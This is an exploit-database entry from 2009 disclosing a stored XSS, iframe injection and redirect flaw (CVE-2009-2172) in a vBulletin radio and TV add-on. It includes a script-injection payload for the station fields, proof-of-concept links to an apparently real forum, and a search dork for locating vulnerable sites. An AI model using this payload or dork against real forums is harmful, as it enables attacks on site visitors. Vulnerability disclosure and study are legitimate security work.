[] NeoSense
E X P L O I T S
title author type platform port cve id

vBulletin Radio and TV Player AddOn - HTML Injection

Author: d3v1l
type: webapps
platform: php
port: 
date_added: 2009-06-14 
date_updated:  
verified: 1 
codes: OSVDB-55318;CVE-2009-2172 
tags: 
aliases:  
screenshot_url:  
application_url: 
vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability

About:-

Radio and TV Add-on will add a radio and TV library to your forum.

Features:-

- Users can add / delete / edit own stations

For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2

Note:-

- To exploit this Bug need to be registred!and after you are registered you can add new radio station
  where name station can be "><script>alert(String.fromCharCode(88,83,83))</script>
  and URL "><script>alert(String.fromCharCode(88,83,83))</script>


Poc: XSS

http://www.musicadigitale.net/forum/radioandtv.php?station=92

Poc: Iframe

http://www.musicadigitale.net/forum/radioandtv.php?station=93

Poc: Redirect

http://www.musicadigitale.net/forum/radioandtv.php?station=94

dorks:- inurl:radioandtv.php

Bug founded by d3v1l [Avram Marius]

Date: 14.06.2009

# milw0rm.com [2009-06-15]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.